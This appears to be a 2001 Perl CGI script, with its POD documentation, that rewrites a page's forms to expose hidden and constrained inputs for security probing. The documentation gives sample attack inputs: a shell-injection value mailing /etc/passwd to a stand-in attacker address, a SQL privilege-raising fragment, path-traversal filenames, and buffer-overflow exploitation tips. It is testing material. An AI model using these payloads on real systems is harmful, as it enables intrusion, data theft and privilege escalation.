#!/usr/bin/perl -Tw
# Extract forms from an HTML file and build a new page for them.
# See POD at end for more explanation.
#
# Eli the Bearded 26 April 2001
use strict;
use CGI;                  # oh so handy for CGI parsing
use URI;                  # oh so handy for normalizing URLs
require LWP::UserAgent;   # oh so handy for fetching pages

package RewriteForm;      # our package, a subclass of HTML::Parser
use base "HTML::Parser";  # oh so handy for HTML parsing

use vars qw( $textarea $isoption $selname %radio $origpage %entity
             $parser $ua $request $response $query );

# Characters that must be escaped before being printed into HTML text or
# into a double-quoted attribute value.
%entity = (
    '&' => '&amp;',
    '<' => '&lt;',
    '>' => '&gt;',
    '"' => '&quot;',
);

# What to show for a select without a name.
sub defselname {
    return 'undef';
} # end &defselname

# What to show for a radio input without a name.
sub defradioname {
    return 'undef';
} # end &defradioname

# How many inputs to show for a select multiple.
sub defsulmultcount {
    return 5;
} # end &defsulmultcount

# HTTP headers printed before any CGI output.
sub headers {
    return "Content-Type: text/html\n\n";
} # end &headers

# Parser state shared between the callbacks below.
$textarea = 0;              # true while inside <textarea> ... </textarea>
$isoption = 0;              # true while inside an <option>
$selname  = defselname();   # escaped name of the current select

# Accepted URLs: "http" in any case followed by printable ASCII only.
# Capture 1 is everything after the scheme and is used for untainting.
my $url_re = qr{^(?i:http)(://[!-~]{1,2000})\z};

# Callback for a tag start.
#   $tag      - tag name
#   $attr     - hashref of attributes (names lower-cased by HTML::Parser)
#   $attrseq  - arrayref of attribute names in original order (unused)
#   $origtext - the tag exactly as it appeared in the page
# Prints a description of every form-related tag followed by a rewritten,
# editable version of it.  Other tags are dropped.
sub start {
    my ($self, $tag, $attr, $attrseq, $origtext) = @_;

    return unless $tag =~ /^(form|input|select|option|textarea)$/i;

    my $tagtype  = lc($1);
    my $esctext  = quote($origtext);
    my $pre      = '';          # description printed before the new tag
    my $post     = "\n<br>\n";  # printed after the new tag
    my $skipthis = 0;           # used for radio buttons after the first
    my $selmult  = 0;           # set for a <select multiple>
    my @allowed;                # attributes copied into the new tag

    if ($tagtype ne 'option' and $isoption) {
        $isoption = 0;
        $pre .= "Was still in \$isoption state. Bad HTML? ";
    }

    if ($tagtype eq 'input') {
        @allowed = ( 'type', 'name', 'value', 'accept', 'checked' );

        # We lc() the type since attribute values have the case preserved
        # by HTML::Parser. (Attribute names have been lower-cased for us.)
        $attr->{type} = lc($attr->{type}) if defined($attr->{type});
        my $inptype = $attr->{type};

        # These types hide or constrain the value; expose them as text.
        if (defined($inptype)
            and $inptype =~ /^(?:hidden|password|checkbox)$/) {
            $attr->{type} = 'text';
        }

        if (defined($inptype)) {
            $pre .= 'Input type ' . quote($inptype) . ', ';
        } else {
            $pre .= "Input type unrecognized, ";
        }

        if (defined($attr->{name})) {
            my $qname = quote($attr->{name});
            $pre .= "named $qname, ";

            if (defined($inptype) and $inptype eq 'radio') {
                if ($radio{$qname}) {
                    # Only the first radio button of a group becomes an
                    # input; later ones just have their values listed.
                    $post = "Input values for the radio button in the "
                          . "$qname text input. " . $post;
                    $skipthis = 1;
                } else {
                    $radio{$qname} = 1;
                    $attr->{type}  = 'text';
                    $post = "Use this text input for $qname the radio "
                          . "buttons. " . $post;
                }
            }
        } else {
            $pre .= "no name found, ";
        }

        # Text-like inputs show their value in the field itself.
        if (!defined($inptype) or ($inptype !~ /hidden|password|text/)) {
            if (defined($attr->{value})) {
                $pre .= 'with value ' . quote($attr->{value}) . ', ';
            } else {
                $pre .= "with no value, ";
            }
        }

        if (defined($attr->{src})) {
            # Make image URLs absolute so they still load from our page.
            $attr->{src} = URI->new_abs( $attr->{src}, $origpage );
            push(@allowed, qw( src border height width ));
        }

        $pre .= "original HTML<br>$esctext\n<br>";

    } elsif ($tagtype eq 'select') {
        if (defined($attr->{name})) {
            $selname = quote($attr->{name});
            $pre .= "Turning select $selname into text input. Any option ";
            $pre .= "values for this select will be printed. ";

            # Keep the select's own name; only the element type changes.
            @allowed      = ( 'type', 'name' );
            $tagtype      = 'input';
            $attr->{type} = 'text';

            if (defined($attr->{multiple})) {
                $pre .= "Note that this select allows multiple inputs, so ";
                $pre .= "more than one text input follows. ";
                $selmult = 1;
            }
        } else {
            $selname = defselname();
        }

    } elsif ($tagtype eq 'option') {
        @allowed  = ( 'value', 'selected' );
        $isoption = 1;
        $pre      = "Original option HTML $esctext\n ";

    } elsif ($tagtype eq 'form') {
        @allowed = ( 'action', 'method', 'enctype', 'name' );
        %radio   = ();   # radio groups are scoped to a single form

        if (defined($attr->{action})) {
            # Make the action absolute so the form submits to the
            # original site rather than relative to this script.
            my $newaction = URI->new_abs( $attr->{action}, $origpage );
            $attr->{action} = $newaction;
            $pre .= 'Form has action ' . quote($newaction) . ', ';
        } else {
            $pre .= "No action found for form, ";
        }

        if (defined($attr->{method})) {
            $pre .= 'method ' . quote($attr->{method}) . ', ';
        } else {
            $pre .= "default method, ";
        }

        $pre .= "original HTML<br>$esctext\n<br>";

    } elsif ($tagtype eq 'textarea') {
        @allowed  = ( 'name', 'cols', 'rows', 'wrap' );
        $textarea = 1;
        $pre     .= "Original HTML<br>$esctext\n<br>";
    }

    # Build the replacement tag from the allowed attributes only.  The
    # values reach us entity-decoded, so they are escaped again here.
    my $newtext = '<' . $tagtype;
    for my $name (@allowed) {
        next unless exists($attr->{$name});
        $newtext .= ' ' . $name;
        if (defined($attr->{$name})) {
            $newtext .= '="' . quote($attr->{$name}) . '"';
        }
    }
    $newtext .= '>';

    print $pre;
    if ($selmult) {
        print "<ol>\n";
        for my $i (1 .. defsulmultcount()) {
            print '<li>' . $newtext . "\n";
        }
        print "</ol>\n";
    } else {
        print $newtext unless ($isoption or $skipthis);
    }
    print $post unless ($textarea or $isoption);
} # end &start

# Callback for a block of text.  Text is only kept inside a textarea
# (copied through) or an option (shown as a description).
sub text {
    my ($self, $text) = @_;

    if ($textarea) {
        print $text;
    } elsif ($isoption) {
        print "Option text for $selname $text<br>\n";
    }
} # end &text

# Callback for a comment.
sub comment {
    my ($self, $comment) = @_;

    # We should never be here if $textarea is set, but who knows
    if ($textarea || $isoption) {
        print "<!--$comment-->";
    }
} # end &comment

# Callback for close tag.  Resets the parser state and echoes the close
# tag, unless we were inside an option when it arrived.
sub end {
    my ($self, $tag, $origtext) = @_;

    return unless $tag =~ /^(form|input|select|option|textarea)$/i;

    my $tagtype   = lc($1);
    my $wasoption = $isoption;
    my $esctext   = quote($origtext);

    if ($tagtype eq 'textarea') {
        $textarea = 0;
    } elsif ($tagtype eq 'option' or $tagtype eq 'select'
             or $tagtype eq 'form') {
        $isoption = 0;
        if ($tagtype ne 'option') {
            $selname = defselname();
        }
    }

    return if $wasoption;

    print $origtext;
    print "<br>Close tag was<br>$esctext\n<br>";
} # end &end

# Quote HTML for safe printing, in text or inside a double-quoted
# attribute value.  Returns the escaped copy; undef becomes ''.
sub quote {
    my $string = shift;

    return '' unless defined($string);

    $string = "$string";   # stringify objects such as URI
    $string =~ s/([<>&"])/$entity{$1}/g;
    return $string;
} # end &quote

# Main program: pick the URL from the command line or the CGI parameter.
$origpage = $ARGV[0];
if (defined($origpage)) {
    if ($origpage =~ /^-+h/i) {
        print "Read POD in $0 for help.\n'perldoc $0' should work.\n";
        exit;
    }
    unless ($origpage =~ $url_re) {
        print "Unrecognized usage. Use as a CGI or read the POD for help.\n";
        print "'perldoc $0' should work.\n";
        exit;
    }
} else {
    $query    = CGI->new;
    $origpage = $query->param('url');
    print headers();
}

if (defined($origpage)) {
    if ($origpage =~ $url_re) {
        # untainted
        $origpage = "http$1";

        $ua       = LWP::UserAgent->new;
        $request  = HTTP::Request->new('GET', $origpage);
        $response = $ua->request($request);

        print "<title>Form Rewriter</title>\n";
        print "<p>page is " . quote($origpage) . "<br>\n";
        if (!$response->is_success) {
            # Error pages can contain forms too, so report and carry on.
            print "fetch failed: " . quote($response->status_line)
                . "<br>\n";
        }
        print "page size is " . length($response->content)
            . " bytes<p>\n";

        $parser = RewriteForm->new;
        $parser->parse($response->content);
        $parser->eof;
    } else {
        print "<title>Form Rewriter</title>\n";
        print "Can't untaint url parameter.\n";
    }
} else {
    # No URL given: show a form asking for one, then the documentation.
    my $form = $ENV{SCRIPT_NAME};

    print "<title>Form Rewriter</title>\n";
    if (!defined($form)) {
        print "Can't find URL for internal form.\n";
        exit;
    }

    print '<form action="' . quote($form) . "\" method=\"get\">\n";
    print "URL of page to process: <input type=\"text\" name=\"url\"> "
        . "<input type=\"submit\">\n";
    print "</form>\n";

    my $podlines = 0;
    while (my $line = <DATA>) {
        if ($podlines++ == 0) {
            print "<hr>\n<h2>POD documentation</h2>\n<pre>\n\n";
        }
        print quote($line);
    }
    if ($podlines) {
        print "\n\n</pre>\n";
    } else {
        print "\n<p>Didn't find POD to print\n";
    }
}

__DATA__

=pod

=head1 NAME

extract-form : HTML form rewriter for command line or CGI use

=head1 DESCRIPTION

This script will fetch an HTML page via HTTP and extract all the
forms out of it. The forms will be rewritten to expose all hidden
inputs, etc, so that random values can be substituted in. Also
Javascript in the page to verify inputs, etc, will be stripped.
Useful for seeing how CGI programs deal with non-sanctioned input.

During the course of rewriting the forms the script will convert
E<lt>SELECTE<gt> tags, E<lt>INPUT TYPE=RADIOE<gt>,
E<lt>INPUT TYPE=CHECKBOXE<gt> and E<lt>INPUT TYPE=HIDDENE<gt> to
E<lt>INPUT TYPE=TEXTE<gt>. The E<lt>OPTIONE<gt> tags inside a
E<lt>SELECTE<gt> will be displayed. (All radio buttons after the
first in a series will be displayed rather than converted: only one
value for the set would be sent by a browser.)

=head1 EXAMPLES

From the command line, provide a URL as the first argument:

    extract-form http://www.yahoo.com/

This script will fetch the page, rewrite the HTML and print it to
standard out.

Through a CGI interface, this takes a single parameter C<url> which
has the URL of the page to process. It rewrites the HTML and returns
it for display in the browser.

=head1 IDEAS FOR TESTING

Some CGI programmers seem to think that variables whose values come
from the HTML rather than the user are safe. This form rewriter makes
those variables more visible for poking random junk in.

There are probably four types of inputs that are most useful to probe.
To an external tester those types are often not inherently obvious.

=over 4

=item 1

arguments passed to Perl's C<open>

These types of input offer the most power. Clever use of C<&>, C<|>,
C<;> and other shell meta-characters can cause all sorts of things to
happen when used in an C<open> call.
A CGI that sends mail might have a hidden variable that has the
recipient's address, which might be used like this:

    open(MAIL,"| $sendmail '$MAILTO'")

If the MAILTO value were changed to be:

    someone@example.com' ; /bin/mail blackhat@example.net < '/etc/passwd

Then the original mail would still be sent, and then the blackhat
would get the password file.

=item 2

items that get used in SQL statements

With these you can potentially change the meaning of an SQL statement
dramatically, much like the shell example above. rain forest puppy
wrote a nice advisory for Bugtraq a while ago (RFP2K01: How I hacked
Packetstorm, B) that explains how he found that numerical values in
the queries at Packetstorm B were not being checked. So he changed a
C<5> to

    5, Status='Administrator', Security=100,

to up his privileges on the system.

=item 3

filenames opened safely but displayed in the HTML

These might be templates or page fragments to display after a form is
processed. It might not be opened by Perl or might be used in a C.
With these you might be able to view any file on the system that the
CGI can read and you can think up the name of. Consider, for example,
a filename like one of these:

    /etc/passwd
    ../../../../../../../../../../../../etc/passwd

In Unix, C<..> at the root level leaves you at the root level. So that
second filename is good for anywhere up to twelve levels deep.

=item 4

buffer overflows

Above I said that the Perl open vulnerability gave the most power. I
lied. Buffer overflows can give you even more power if you can get
machine code in the overflow to execute. The way to probe for a buffer
overflow is to try inserting very long values into each parameter.
"Very long" can be a few hundred characters to a few thousand.
Typically people seem to use the letter C repeated.

Once a buffer overflow is found, exploiting it can be tricky. You need
to know the type of computer running the CGI (services like Netcraft,
B<http://www.netcraft.com/>, can help you identify the system).
You need to have a suitable shell code to use. Aleph One's paper
"Smashing The Stack For Fun And Profit", B, explains how to craft
shell code or a search engine might find you one.

=back

=head1 IDEAS FOR IMPROVEMENT

It would be really nice if the script could figure out what text is
used to label form inputs so that could be printed with the rewritten
form. Although HTML 4.0 includes a E<lt>LABELE<gt> tag for just that
purpose, this script does not attempt to use them. Most web pages
don't have them, anyway.

It could be useful if the script could add additional form elements.
Some CGI programs check the value of the submit button, but this does
not provide a way to alter that. This is slightly tricky to alter
since if there are multiple submit buttons they could have different C
attributes, but the browser would only return the name and value of
the one clicked. Also image submit buttons return two values, a
C<{name}.x> and a C<{name}.y> with pixel coordinates to indicate where
in the image the user clicked.

It would be nicer if the script could be flexible about how many
inputs to provide for a E<lt>SELECT MULTIPLEE<gt> statement.

It would be handy if the script could automatically generate long
strings for buffer overflow testing.

=head1 COPYRIGHT

This script is by Eli the Bearded. The home source for it is his
directory at CPAN, I.

This script is released to the public domain. Modifications and
redistribution are encouraged. Leaving an attribution to Eli the
Bearded would be nice, but is not required.

=head1 OSNAMES

This should not have any OS dependencies. NCSA and Apache style
environment variables might be needed for CGI use.

=head1 CPAN INFO

=head1 SCRIPT CATEGORIES

Web
CGI

=head1 README

HTML form rewriter for command line or CGI use. Rewritten forms have
hidden inputs exposed for probing.

=head1 PREREQUISITES

This script uses the C<strict>, C<CGI>, C<URI>, C<LWP::UserAgent>,
C<HTML::Parser>, and C<vars> modules.
Either version 2 or 3 of HTML::Parser should work.

=head1 COREQUISITES

The CGI module really should be optional if not running as a CGI, but
this is not written to allow that.

=cut